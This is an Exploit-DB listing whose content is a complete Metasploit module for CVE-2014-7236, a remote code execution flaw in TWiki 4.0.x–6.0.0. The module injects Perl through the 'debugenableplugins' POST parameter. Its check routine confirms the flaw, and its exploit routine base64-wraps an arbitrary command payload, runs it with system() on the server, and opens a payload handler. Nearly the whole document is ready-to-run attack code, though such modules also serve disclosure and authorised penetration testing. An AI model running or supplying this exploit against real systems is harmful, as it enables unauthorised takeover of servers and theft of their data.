TWiki Debugenableplugins - Remote Code Execution (Metasploit)

EDB-ID:

36438




Platform:

PHP

Date:

2015-03-19


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'TWiki Debugenableplugins Remote Code Execution',
      'Description' => %q{
        TWiki 4.0.x-6.0.0  contains a vulnerability in the Debug functionality.
        The value of the debugenableplugins parameter is used without proper sanitization
        in an Perl eval statement which allows remote code execution
      },
      'Author' =>
        [
          'Netanel Rubin', # from Check Point - Discovery
          'h0ng10', # Metasploit Module

        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2014-7236'],
          [ 'OSVDB', '112977'],
          [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236']
        ],
      'Privileged' => false,
      'Targets' =>
        [
          [ 'Automatic',
            {
              'Payload'        =>
                {
                  'BadChars' => "",
                  'Compat'      =>
                    {
                      'PayloadType' => 'cmd',
                      'RequiredCmd' => 'generic perl python php',
                    }
                },
              'Platform' => ['unix'],
              'Arch' => ARCH_CMD
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Oct 09 2014'))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "TWiki path", '/do/view/Main/WebHome' ]),
        OptString.new('PLUGIN', [true, "A existing TWiki Plugin", 'BackupRestorePlugin'])
      ], self.class)
  end


  def send_code(perl_code)
    uri = target_uri.path
    data = "debugenableplugins=#{datastore['PLUGIN']}%3b" + CGI.escape(perl_code) + "%3bexit"

    res = send_request_cgi!({
      'method' => 'POST',
      'uri' => uri,
      'data' => data
    })

    return res
  end


  def check
    rand_1 = rand_text_alpha(5)
    rand_2 = rand_text_alpha(5)

    code = "print(\"Content-Type:text/html\\r\\n\\r\\n#{rand_1}\".\"#{rand_2}\")"
    res = send_code(code)

    if res and res.code == 200
      return CheckCode::Vulnerable if res.body == rand_1 + rand_2
    end
    CheckCode::Unknown
  end


  def exploit
    code = "print(\"Content-Type:text/html\\r\\n\\r\\n\");"
    code += "require('MIME/Base64.pm');MIME::Base64->import();"
    code += "system(decode_base64('#{Rex::Text.encode_base64(payload.encoded)}'));exit"
    res = send_code(code)
    handler

  end

end